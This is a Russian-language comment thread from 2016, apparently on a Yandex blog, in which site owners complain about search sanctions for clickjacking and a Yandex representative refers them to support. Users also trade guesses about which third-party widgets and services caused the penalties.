И что нам теперь делать?Прочитал все рекомендации, блок, на самом деле понял мало чего. Посещалка с почти 400 с яндекса упала до 80.
Мне все 450 страниц теперь в ручную хтмл код проверять или переписывать?
Написал в тех поддержку, пока тишина. Гляньте одним глазком сайт, объясните в каком направлении двигаться хоть, раз санкции применены? Не мог ли быть сам хостинг виновником этого сам?
Заранее спасибо.
pestovodom,
если проблема сохраняется, пожалуйста, обратитесь в поддержку
хохохо вот это мы не удачно роутер поменяли в декабре, а я то думал какого черта в декабре бахнуло в низ, только вот мы не использовали кликджекинг и прочую чернуху и лжеприблюды и что нам тепер делать? я так понял асессор не разобравшись в смене поведения сайта, счел изменения на сайте за нововведение яндекса против кликджекинг. очень печально, а что такого произошло 23 апреля? в прошлом году тоже в конце апреля стуканули всем по башке. людям и так тяжело в летний сезон уходить, а второй год всподряд перед сезоном такие понижения это перебор.
Sofitech,
изменения на сайте не считаются clickjacking'ом, если они этот самый clickjacking не реализуют на практике. Наказания без clickjacking'а не бывает. Если вы уверены, что есть какая-то ошибка, то обратитесь, пожалуйста, в службу поддержки, предоставив необходимые факты.
Здравствуйте.
Добавил на сайт код Adsense в сайдбар три дня назад, один большой баннер в сайдбаре, сегодня с обеда схватил фильтр. Подскажите пожалуйста, размещение рекламного кода от Google как то может повлиять на понижение ранжирования в поиске Яндекс?
Eduard Barbus,
санкция за clickjacking? Нет, через рекламу Adsense он не должен осуществляться, разве что в рамках баннера и если такое пропущено модерацией Google.
click-prodengi
16 мая 2016, 15:00
safesearch, у нас аналогичная проблема, был бы очень признателен за помощь. С какого-то времени наш сайт под санкциями за кликджекинг, однако мы никак не можем разобраться в чем причина - https://yadi.sk/i/3pic7Nq2rk6jS. Тех.поддержка так и не ответила за 3 недели, между тем все это время мы теряем свои позиции в рейтинге. 
Вы можете дать нам более подробную информацию - какой код на сайте вызвал санкции, так как все сервисы, которые мы юзаем для соц.шеринга стоят очень давно и есть ли смысл их с сайта полностью убирать?
Если возможно дайте пжл фидбек на емейл - cat@prodengi.kz
click-prodengi,
обратитесь, пожалуйста, в поддержку, сославшись на свой исходный комментарий
click-prodengi
27 мая 2016, 12:48
safesearch,
если подскажете как обратиться, было бы замечательно! пытаемся оставить вопрос - то подставляются ответы из FAQ, то не работает сама форма. 
Возможно это сделать как-то через Кабинет Вебмастера? обратиться за поддержкой
click-prodengi,
В интерфейсе Вебмастера есть ссылка "Обратная связь" (внизу справа).
click-prodengi
16 мая 2016, 15:00
safesearch, у нас аналогичная проблема, был бы очень признателен за помощь. С какого-то времени наш сайт под санкциями за кликджекинг, однако мы никак не можем разобраться в чем причина - https://yadi.sk/i/3pic7Nq2rk6jS. Тех.поддержка так и не ответила за 3 недели, между тем все это время мы теряем свои позиции в рейтинге. 
Вы можете дать нам более подробную информацию - какой код на сайте вызвал санкции, так как все сервисы, которые мы юзаем для соц.шеринга стоят очень давно и есть ли смысл их с сайта полностью убирать?
Если возможно дайте пжл фидбек на емейл - cat@prodengi.kz
ya.soglasie-ooo
23 мая 2016, 13:04
click-prodengi,
у вас на главной странице есть блок с онлайн-консультациями, при нажатие на задать вопрос происходит кликджекинг.
click-prodengi,
все общение по конкретным сайтам - через нашу службу поддержки во избежание недоразумений
Есть у кого нибудь плачевный опыт использования сервиса admeo.ru - в период с марта по май, например?
seo@starta.ru,
 А У Колбекхантера есть автоколбек, который звонит клиентам при заходе на сайт это типо фича, номер я так понял из собственной базы тех кто пользовался сервисом, оставлял номер.  Это кликджекинг или нет? Номер тоже передается? Вот презентация фичи https://youtu.be/m8voehuKnkY

o.antimonova,
зависит от реализации  метода получения информации о пользователе
хочу использовать сервис вк трекер, который идентифицирует посетителей но не использует кликджекинг. будет ли это влиять на позиции сайта.

artembu83,
все используют кликджекинги нагло врут. В том числе и вк трекер.
Возмущению нет предела - мой сайт ручная работа, маленький семейный бизнес, а не серая машина по обману нещщасных юзеров, я сама пишу тексты, описываю поездки, фотографии мои, и вдруг меня бездушный робот большого и важного Яндекса обвиняет в том, о чем я даже и не думала и без суда и следствия уничтожает всю работу про продвижению сайта! На кого мне грешить? На формы подписки Юнисендера? На форму поиска тура от Турвизора в котором туристу предлагается оставить контакты, если поисковик ему ничего не предложил? Большому важному Яндексу не до мелочи - сами, дорогие сайтовладельцы и рекламодатели (между прочим!) ищите "вредоносный код" и доказывайте, что не верблюд! И попытка только одна на 31 день! А в туризме 1 месяц это треть горячего сезона!
privatik,
мы можем посоветовать внимательнее выбирать сервисы, которые используются на вашем сайте. Ваша проблема понятна (и, если вы не можете разобраться с ней сами, то обратитесь в нашу поддержку), но мы не можем жертвовать из-за этого безопасностью пользователей.
Всем привет. Вот и мой сайт стал "счастливым" обладателем санкций от яндекса. Очень надеюсь на вашу помощь!!!!!!!! После сигнала от яндекса о кликджекинге я написал в службу поддержки и мне любезно указали страницу на моем сайте на которой реализуется кликджекинг. На тот момент на этой странице просто был код iframe в котором открывался сторонний лендинг - больше никакого кода не было.


Я так и подумал, что кликджекинг реализуется на стороннем лендинге, который открывается у меня на сайте, поэтому на всякий случай удалил с сайта все iframe. А вместо них сделал стандартный редирект на php. Спустя некоторое время информация о нарушении из яндекс вебмастера исчезла.


Но примерно через недельку опять пришло такое же сообщение, я опять написал в службу поддержки и мне опять указали на этот же документ. Возникает вопос: Откуда там кликджекинг? Если кроме кода перенаправления в тот момент, там ничего не было!
После чего я вообще удалил этот файл и в очередной раз нажал кнопку в яндекс вебмастере "я все исправил"


А теперь мне пришло сообщение о том, что санкции увеличены на 2 месяца. Что за фигня!!! Как можно наказывать кого то за то чего тот не совершал. Я реально не понимаю, что вообще происходит. Очень надеюсь, что тут найдутся добрые люди, которые смогут помочь мне с сайтом. Не знаю можно ли тут вставлять ссылку, но выбора у меня нет , вот сайт: info-produkt.ru а это моя почта: vas.dlinny@yandex.ru, если необходимо. Помогите люди добрые!
Admeo - никому не рекомендую в ней работать или заключать договора!
Заключил договор по рекомендации своего директора по маркетингу. Перед заключением договора уточнил законность работы данной компании. На что получил утвердительный ответ, что все в полном порядке.
По факту мой сайт 2 раза заблокировал Яндекс, в результате чего сайт потерял в позициях. На мое законное требование вернуть деньги, компания «кормит обещаниями» уже 3 месяца. Написал письма 2 раза, звонил 30 раз. Без толку. Придется обращаться в суд!
Хотите убедиться сами, позвоните сами в компании и попросите соединить с руководством. На что получите отрицательный ответ
Обновлено 15 ноября 2016, 16:08
Уважаемые разработчики...Было б очень неплохо, думаю согласятся как минимум 90% владельцев сайта, если б в вебмастере появился подраздел, где робот янднкса укажет хотя б адреса страниц или место расположения этого самого вредного скрипта...
Нет нормальных софтов для проверки, робот яндекса все видит по-своему....была проведена куча работы по выявлению и устранению всех сторонних ссылок и скриптов...но увы ограничения продлили ещё на 2 месяца...
Может сбой в самой системе???
kolesiko999,
 Вот и у меня похожая фигня. Все файлы на которые мне указали в службе поддержки я удалил совсем от греха подальше. И через месяц санкции продлили на 2 месяца. А теперь мне в службе поддержки заявляют, что никогда не предоставляют информацию о том, что удалять или исправлять. Пишут, что вебмастер сам должен во всем разобраться.
День добрый! Я убрал скрипт с сайта и больше не буду ставить. Уберите пожалуйста баннер об опасности моего сайта. kinghouse22.ru
А теперь вопрос в к самому яндексу? Господа объясните такую ситуацию :
1) Вы сами собираете данные о пользователях: пол возраст, предпочтения, операционные системы , вплоть до того что просматривает пользователь, это то о чем я знаю, а ведь есть то что мы все не знаем. 
2) навязываете рекламу в принудительном порядке : Те если я искал детскую  коляску ,то на сайтах где присутствует реклама от яндекса мне постоянно предлагают коляски, то есть вы используете мой запрос для навязывания товаров и услуг что рекламируются через яндекс директ. в принудительном для меня порядке..
 Как это называется у вас ? В России это называется воровством информации.... 
А недавно наткнулся на вот такую надпись возле своего сайта:
По данным Яндекса, сайт может выполнять нежелательные действия
Посещение этого сайта может привести к выполнению нежелательных действий на других сайтах без вашего ведома (кликджекинг). Например, к подписке на группу в социальной сети или получению доступа к вашей личной информации. Подробнее
Всё равно перейти на эту страницу
Посещение сайта может привести к НЕЖЕЛАТЕЛЬНЫМ последствиям-- фактически вы клиента отстраняют от сайта, клиент не заходит на сайт, клиент не покупает товар, а мы не платим налоги, Любое подобное решение может вынести только Суд. все остальные  могут рассматриваться лишь как клеветники.
admeo.ru - Кликджекинг чистой воды, Яндекс понижает сайты с их кодом. Мало того, компания по документам оформлена как микрокредитная, не выполнили свои обязательства по договору, взыскивали через суд с них деньги.